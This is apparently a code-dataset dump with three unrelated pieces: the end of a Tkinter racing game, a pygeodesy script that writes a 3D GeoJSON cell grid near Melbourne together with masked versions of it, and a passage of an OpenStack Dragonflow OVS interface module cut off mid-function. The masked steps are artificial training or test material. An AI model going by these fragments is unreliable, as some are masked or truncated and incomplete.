elif data.Invincible2 == False:hitAI2(data,13)\r\n data.player1Y-=data.speedAI\r\n #establishing winer\r\n if data.player1Y < 15 and data.player2Y >15: data.winner= \"player1\"\r\n if data.player1Y>40:\r\n data.time +=1\r\n coconutShotAI(data)\r\n data.player2Y-=data.speedAI\r\n if data.player2Y < 15 and data.player1Y> 15: data.winner= \"player2\" \r\n if data.player2Y>40:\r\n data.time +=1\r\n coconutShotAI(data)\r\n if data.player1Y < 15 and data.player2Y <15: data.winner = \"tie\"\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n powerUpAITimerFired(data)\r\n\r\ndef powerUpAITimerFired(data):\r\n #moves both sides symmetrically \r\n for powerUp in data.invincible:\r\n powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug:\r\n bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n if data.start1 != None:\r\n if abs(data.start1-data.player1Y) >= 120:\r\n data.pause1Drop = False\r\n data.Invincible1 = False\r\n if data.start2 != None:\r\n if abs(data.start2-data.player2Y) >= 120:\r\n data.pause2Drop = False\r\n data.Invincible2 = False\r\n \r\n\r\n\r\ndef AIRedrawAll(canvas, data):\r\n canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)\r\n canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)\r\n canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconutsAI1:\r\n coconut.draw(canvas)\r\n for coconut in data.coconutsAI2:\r\n coconut.draw(canvas)\r\n canvas.create_text(50,40, text = \"Computer\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n canvas.create_text(450,40, text = \"Player 1\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\r\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\r\n AIWinner(canvas, data)\r\n drawHome(canvas, 
data)\r\n\r\ndef AIWinner(canvas, data):\r\n if data.winner== \"player1\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"The Computer Won :(\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"player2\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! You Won!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"tie\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"Tie! 
You Both Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n####################################\r\n# ScoreBoard mode\r\n####################################\r\n\r\ndef scoreboardKeyPressed(event, data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef scoreboardMousePressed(event, data): checkHome(event, data)\r\n\r\ndef scoreboardTimerFired(data):\r\n difficultyTimerFired(data)\r\n\r\ndef scoreboardRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.tbgY, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.txtTScore, text=\"Top Scores!\",\r\n font = \"Arial 30 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2, data.S_P, text=\"Score_Player\",\r\n font = \"Arial 20 bold\", fill = \"yellow\")\r\n drawHome(canvas, data)\r\n #reads file\r\n data.savedScores\r\n data.savedScores=readFile(\"score.txt\")\r\n score=data.savedScores.splitlines()\r\n scores=[]\r\n for line in score:\r\n scores.append(line.split(\",\"))\r\n #sorts scores to find top 5\r\n scores = sorted(scores, key = lambda x: int(x[0]))\r\n top5 = scores[-data.numScores:]\r\n top5.reverse()\r\n for i in range(len(top5)):\r\n canvas.create_text(data.width/2, data.scoreShift+(i*50),\r\n text = top5[i],\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# help mode\r\n####################################\r\n\r\ndef helpKeyPressed(event, data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef helpMousePressed(event, data): checkHome(event, data)\r\n\r\ndef helpTimerFired(data):\r\n difficultyTimerFired(data)\r\n\r\ndef helpRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.helpY, image=data.helpScreen)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n drawHome(canvas, data)\r\n\r\n#######################################\r\n# use the run function as-is from 
notes\r\n#######################################\r\n\r\ndef run(width=15000, height=25000):\r\n def redrawAllWrapper(canvas, data):\r\n canvas.delete(ALL)\r\n redrawAll(canvas, data)\r\n canvas.update() \r\n\r\n def mousePressedWrapper(event, canvas, data):\r\n mousePressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def keyPressedWrapper(event, canvas, data):\r\n keyPressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def timerFiredWrapper(canvas, data):\r\n timerFired(data)\r\n redrawAllWrapper(canvas, data)\r\n # pause, then call timerFired again\r\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\r\n # Set up data and call init\r\n class Struct(object): pass\r\n data = Struct()\r\n data.width = width\r\n data.height = height\r\n data.timerDelay = 100 # milliseconds\r\n # create the root and the canvas\r\n root = Tk()\r\n init(data)\r\n canvas = Canvas(root, width=data.width, height=data.height)\r\n canvas.pack()\r\n # set up events\r\n root.bind(\"<Button-1>\", lambda event:\r\n mousePressedWrapper(event, canvas, data))\r\n root.bind(\"<Key>\", lambda event:\r\n keyPressedWrapper(event, canvas, data))\r\n timerFiredWrapper(canvas, data)\r\n # and launch the app\r\n root.mainloop() # blocks until window is closed\r\n print(\"bye!\")\r\n\r\nrun(1000, 1000)\r\n", "step-ids": [ 66, 79, 82, 95, 104 ] }
[ 66, 79, 82, 95, 104 ]
# GeoPy can be used to interface to map box https://pypi.org/project/geopy/ from pygeodesy.ellipsoidalVincenty import LatLon from geojson import Polygon, Feature, FeatureCollection, dump import sys import random BEARING_SOUTH = 180.0 BEARING_EAST = 90.0 class Cell(object): def __init__(self, cellId, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell): self.cellId = cellId self.top_left_cell = top_left_cell self.top_right_cell = top_right_cell self.bottom_right_cell = bottom_right_cell self.bottom_left_cell = bottom_left_cell def __repr__(self): return str(self.__dict__) def generate_cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell): c = Cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell) # Expect other data to be inserted into the cell here return c def generate_cell_grid(top_left, east_extent, south_extent, cell_lat_size_meters, cell_long_size_meters): south_distance = 0 current_cell_id = 0 list_of_cells = [] left_edge = top_left while south_distance < south_extent: south_distance = south_distance + cell_lat_size_meters point_south_of_left_edge = left_edge.destination(cell_lat_size_meters, BEARING_SOUTH) top_left_cell = left_edge bottom_left_cell = point_south_of_left_edge east_distance = 0 while east_distance < east_extent: top_right_cell = top_left_cell.destination(cell_long_size_meters, BEARING_EAST) bottom_right_cell = bottom_left_cell.destination(cell_long_size_meters, BEARING_EAST) cell = generate_cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell) current_cell_id = current_cell_id + 1 list_of_cells.append(cell) # Increments top_left_cell = top_right_cell bottom_left_cell = bottom_right_cell east_distance = east_distance + cell_long_size_meters left_edge = point_south_of_left_edge return list_of_cells def grid_to_geojson(grid, lower_elevation, upper_elevation): features = [] for cell in grid: rect_points = [ [ 
(cell.top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell.lat, lower_elevation), (cell.bottom_right_cell.lon, cell.bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell.lon, cell.bottom_left_cell.lat, lower_elevation), (cell.top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), #Because first and last points have to match (cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation), (cell.top_right_cell.lon, cell.top_right_cell.lat, upper_elevation), (cell.bottom_right_cell.lon, cell.bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell.lon, cell.bottom_left_cell.lat, upper_elevation), (cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation) #Because first and last points have to match ] ] properties = { 'capacity': random.randint(0, 5) } # TODO this is just an example polygon = Polygon(rect_points) feature = Feature(geometry=polygon, id=cell.cellId, properties=properties) features.append(feature) return FeatureCollection(features) def main(): TOP_LEFT = LatLon(-37.721874, 144.966859) EAST_EXTENT = 1000.0 SOUT_EXTENT = 1000.0 CELL_LONG_SIZE_METERS = 100.0 CELL_LAT_SIZE_METERS = 100.0 grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT, CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS) geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0) dump(geojson_feature_collection, sys.stdout, indent=4) json_file = open('grid-3d.geojson', 'w') dump(geojson_feature_collection, json_file, indent=4) if __name__ == '__main__': main()
normal
{ "blob_id": "01f0ad8746ed9a9941faa699b146625ad3a0b373", "index": 4289, "step-1": "<mask token>\n\n\nclass Cell(object):\n\n def __init__(self, cellId, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell)\n return c\n\n\n<mask token>\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n for cell in grid:\n rect_points = [[(cell.top_left_cell.lon, cell.top_left_cell.lat,\n lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell\n .lat, lower_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, lower_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (\n cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation\n ), (cell.top_right_cell.lon, cell.top_right_cell.lat,\n upper_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, upper_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, upper_elevation)]]\n properties = {'capacity': random.randint(0, 5)}\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=\n properties)\n features.append(feature)\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n grid = generate_cell_grid(TOP_LEFT, 
EAST_EXTENT, SOUT_EXTENT,\n CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Cell(object):\n\n def __init__(self, cellId, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell)\n return c\n\n\ndef generate_cell_grid(top_left, east_extent, south_extent,\n cell_lat_size_meters, cell_long_size_meters):\n south_distance = 0\n current_cell_id = 0\n list_of_cells = []\n left_edge = top_left\n while south_distance < south_extent:\n south_distance = south_distance + cell_lat_size_meters\n point_south_of_left_edge = left_edge.destination(cell_lat_size_meters,\n BEARING_SOUTH)\n top_left_cell = left_edge\n bottom_left_cell = point_south_of_left_edge\n east_distance = 0\n while east_distance < east_extent:\n top_right_cell = top_left_cell.destination(cell_long_size_meters,\n BEARING_EAST)\n bottom_right_cell = bottom_left_cell.destination(\n cell_long_size_meters, BEARING_EAST)\n cell = generate_cell(current_cell_id, top_left_cell,\n top_right_cell, bottom_right_cell, bottom_left_cell)\n current_cell_id = current_cell_id + 1\n list_of_cells.append(cell)\n top_left_cell = top_right_cell\n bottom_left_cell = bottom_right_cell\n east_distance = east_distance + cell_long_size_meters\n left_edge = point_south_of_left_edge\n return list_of_cells\n\n\ndef 
grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n for cell in grid:\n rect_points = [[(cell.top_left_cell.lon, cell.top_left_cell.lat,\n lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell\n .lat, lower_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, lower_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (\n cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation\n ), (cell.top_right_cell.lon, cell.top_right_cell.lat,\n upper_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, upper_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, upper_elevation)]]\n properties = {'capacity': random.randint(0, 5)}\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=\n properties)\n features.append(feature)\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT,\n CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Cell(object):\n\n def __init__(self, cellId, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef 
generate_cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell)\n return c\n\n\ndef generate_cell_grid(top_left, east_extent, south_extent,\n cell_lat_size_meters, cell_long_size_meters):\n south_distance = 0\n current_cell_id = 0\n list_of_cells = []\n left_edge = top_left\n while south_distance < south_extent:\n south_distance = south_distance + cell_lat_size_meters\n point_south_of_left_edge = left_edge.destination(cell_lat_size_meters,\n BEARING_SOUTH)\n top_left_cell = left_edge\n bottom_left_cell = point_south_of_left_edge\n east_distance = 0\n while east_distance < east_extent:\n top_right_cell = top_left_cell.destination(cell_long_size_meters,\n BEARING_EAST)\n bottom_right_cell = bottom_left_cell.destination(\n cell_long_size_meters, BEARING_EAST)\n cell = generate_cell(current_cell_id, top_left_cell,\n top_right_cell, bottom_right_cell, bottom_left_cell)\n current_cell_id = current_cell_id + 1\n list_of_cells.append(cell)\n top_left_cell = top_right_cell\n bottom_left_cell = bottom_right_cell\n east_distance = east_distance + cell_long_size_meters\n left_edge = point_south_of_left_edge\n return list_of_cells\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n for cell in grid:\n rect_points = [[(cell.top_left_cell.lon, cell.top_left_cell.lat,\n lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell\n .lat, lower_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, lower_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (\n cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation\n ), (cell.top_right_cell.lon, cell.top_right_cell.lat,\n upper_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, upper_elevation), 
(cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, upper_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, upper_elevation)]]\n properties = {'capacity': random.randint(0, 5)}\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=\n properties)\n features.append(feature)\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT,\n CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\nif __name__ == '__main__':\n main()\n", "step-4": "<mask token>\nBEARING_SOUTH = 180.0\nBEARING_EAST = 90.0\n\n\nclass Cell(object):\n\n def __init__(self, cellId, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell)\n return c\n\n\ndef generate_cell_grid(top_left, east_extent, south_extent,\n cell_lat_size_meters, cell_long_size_meters):\n south_distance = 0\n current_cell_id = 0\n list_of_cells = []\n left_edge = top_left\n while south_distance < south_extent:\n south_distance = south_distance + cell_lat_size_meters\n point_south_of_left_edge = left_edge.destination(cell_lat_size_meters,\n BEARING_SOUTH)\n top_left_cell = left_edge\n 
bottom_left_cell = point_south_of_left_edge\n east_distance = 0\n while east_distance < east_extent:\n top_right_cell = top_left_cell.destination(cell_long_size_meters,\n BEARING_EAST)\n bottom_right_cell = bottom_left_cell.destination(\n cell_long_size_meters, BEARING_EAST)\n cell = generate_cell(current_cell_id, top_left_cell,\n top_right_cell, bottom_right_cell, bottom_left_cell)\n current_cell_id = current_cell_id + 1\n list_of_cells.append(cell)\n top_left_cell = top_right_cell\n bottom_left_cell = bottom_right_cell\n east_distance = east_distance + cell_long_size_meters\n left_edge = point_south_of_left_edge\n return list_of_cells\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n for cell in grid:\n rect_points = [[(cell.top_left_cell.lon, cell.top_left_cell.lat,\n lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell\n .lat, lower_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, lower_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (\n cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation\n ), (cell.top_right_cell.lon, cell.top_right_cell.lat,\n upper_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, upper_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, upper_elevation)]]\n properties = {'capacity': random.randint(0, 5)}\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=\n properties)\n features.append(feature)\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT,\n CELL_LAT_SIZE_METERS, 
CELL_LONG_SIZE_METERS)\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\nif __name__ == '__main__':\n main()\n", "step-5": "# GeoPy can be used to interface to map box https://pypi.org/project/geopy/\nfrom pygeodesy.ellipsoidalVincenty import LatLon\nfrom geojson import Polygon, Feature, FeatureCollection, dump\nimport sys\nimport random\n\nBEARING_SOUTH = 180.0\nBEARING_EAST = 90.0\n\n\nclass Cell(object):\n def __init__(self, cellId, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell)\n # Expect other data to be inserted into the cell here\n return c\n\n\ndef generate_cell_grid(top_left, east_extent, south_extent, cell_lat_size_meters, cell_long_size_meters):\n south_distance = 0\n current_cell_id = 0\n\n list_of_cells = []\n\n left_edge = top_left\n\n while south_distance < south_extent:\n south_distance = south_distance + cell_lat_size_meters\n point_south_of_left_edge = left_edge.destination(cell_lat_size_meters, BEARING_SOUTH)\n\n top_left_cell = left_edge\n bottom_left_cell = point_south_of_left_edge\n east_distance = 0\n\n while east_distance < east_extent:\n top_right_cell = top_left_cell.destination(cell_long_size_meters, BEARING_EAST)\n bottom_right_cell = bottom_left_cell.destination(cell_long_size_meters, BEARING_EAST)\n\n cell = generate_cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, 
bottom_left_cell)\n current_cell_id = current_cell_id + 1\n\n list_of_cells.append(cell)\n\n # Increments\n top_left_cell = top_right_cell\n bottom_left_cell = bottom_right_cell\n east_distance = east_distance + cell_long_size_meters\n\n left_edge = point_south_of_left_edge\n\n return list_of_cells\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n\n for cell in grid:\n rect_points = [\n [\n (cell.top_left_cell.lon, cell.top_left_cell.lat, lower_elevation),\n (cell.top_right_cell.lon, cell.top_right_cell.lat, lower_elevation),\n (cell.bottom_right_cell.lon, cell.bottom_right_cell.lat, lower_elevation),\n (cell.bottom_left_cell.lon, cell.bottom_left_cell.lat, lower_elevation),\n (cell.top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), #Because first and last points have to match\n\n (cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation),\n (cell.top_right_cell.lon, cell.top_right_cell.lat, upper_elevation),\n (cell.bottom_right_cell.lon, cell.bottom_right_cell.lat, upper_elevation),\n (cell.bottom_left_cell.lon, cell.bottom_left_cell.lat, upper_elevation),\n (cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation) #Because first and last points have to match\n ]\n ]\n properties = {\n 'capacity': random.randint(0, 5)\n } # TODO this is just an example\n\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=properties)\n\n features.append(feature)\n\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT, CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n\n json_file = open('grid-3d.geojson', 'w')\n 
dump(geojson_feature_collection, json_file, indent=4)\n\n\n\n\nif __name__ == '__main__':\n main()\n", "step-ids": [ 6, 7, 8, 9, 11 ] }
[ 6, 7, 8, 9, 11 ]
# Copyright (c) 2015 OpenStack Foundation. # # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import netaddr from oslo_config import cfg from oslo_log import log from ovs import vlog from dragonflow.controller.common import constants from dragonflow.db.models import ovs from dragonflow.db.models import qos from dragonflow.ovsdb import impl_idl LOG = log.getLogger(__name__) OFPORT_RANGE_MIN = 1 OFPORT_RANGE_MAX = 65533 OVS_LOG_FILE_NAME = 'df-ovs.log' class OvsApi(object): """The interface of openvswitch Consumers use this class to set openvswitch or get results from openvswitch. """ def __init__(self, ip, protocol='tcp', port='6640', timeout=10): super(OvsApi, self).__init__() self.ip = ip self.protocol = protocol self.port = port # NOTE: This has to be this name vsctl_timeout, as neutron will use # this attribute to set the timeout of ovs db. 
self.vsctl_timeout = timeout self.ovsdb = None self.integration_bridge = cfg.CONF.df.integration_bridge if cfg.CONF.log_dir: vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME) else: vlog.Vlog.init() def initialize(self, nb_api): db_connection = ('%s:%s:%s' % (self.protocol, self.ip, self.port)) nb_api.db_change_callback(None, None, constants.CONTROLLER_OVS_SYNC_STARTED, None) self.ovsdb = impl_idl.DFOvsdbApi( nb_api, db_connection, self.vsctl_timeout) nb_api.db_change_callback(None, None, constants.CONTROLLER_OVS_SYNC_FINISHED, None) def _db_get_val(self, table, record, column, check_error=False, log_errors=True): return self.ovsdb.db_get(table, record, column).execute( check_error=check_error, log_errors=log_errors) def _get_bridge_for_iface(self, iface_name): return self.ovsdb.iface_to_br(iface_name).execute() def set_controller(self, bridge, targets): self.ovsdb.set_controller(bridge, targets).execute() def set_controller_fail_mode(self, bridge, fail_mode): self.ovsdb.set_fail_mode(bridge, fail_mode).execute() def check_controller(self, target): controllers = self.ovsdb.get_controller( self.integration_bridge).execute() return target in controllers def check_controller_fail_mode(self, fail_mode): return fail_mode == self._db_get_val('Bridge', self.integration_bridge, 'fail_mode') def get_virtual_tunnel_ports(self): ifaces = self.ovsdb.db_find( 'Interface', ('options', '=', {'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute() tunnel_ports = [] for iface in ifaces: if (self.integration_bridge != self._get_bridge_for_iface(iface['name'])): continue tunnel_ports.append( ovs.OvsPort( id=str(iface['uuid']), name=iface['name'], tunnel_type=iface['type'], ), ) return tunnel_ports def add_virtual_tunnel_port(self, tunnel_type): self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute() def delete_port(self, switch_port): self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute() @staticmethod def _check_ofport(port_name, ofport): if 
ofport is None: LOG.warning("Can't find ofport for port %s.", port_name) return False if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX: LOG.warning("ofport %(ofport)s for port %(port)s is invalid.", {'ofport': ofport, 'port': port_name}) return False return True def get_interface_by_id_with_specified_columns(self, port_id, specified_columns): columns = {'external_ids', 'name'} columns.update(specified_columns) ifaces = self.ovsdb.db_find( 'Interface', ('external_ids', '=', {'iface-id': port_id}), columns=columns).execute() for iface in ifaces: if (self.integration_bridge != self._get_bridge_for_iface(iface['name'])): # iface-id is the port id in neutron, the same neutron port # might create multiple interfaces in different bridges continue return iface def get_port_ofport_by_id(self, port_id): iface = self.get_interface_by_id_with_specified_columns( port_id, {'name', 'ofport'}) if iface and self._check_ofport(iface['name'], iface['ofport']): return iface['ofport'] def get_local_port_mac_in_use(self, port_id): iface = self.get_interface_by_id_with_specified_columns( port_id, {'mac_in_use'}) if iface and netaddr.valid_mac(iface['mac_in_use']): return iface['mac_in_use'] def _get_port_name_by_id(self, port_id): ifaces = self.ovsdb.db_find( 'Interface', ('external_ids', '=', {'iface-id': port_id}), columns=['external_ids', 'name']).execute() for iface in ifaces: if (self.integration_bridge != self._get_bridge_for_iface(iface['name'])): # iface-id is the port id in neutron, the same neutron port # might create multiple interfaces in different bridges continue return iface['name'] def _gen_link_mapping(self, bridge1, 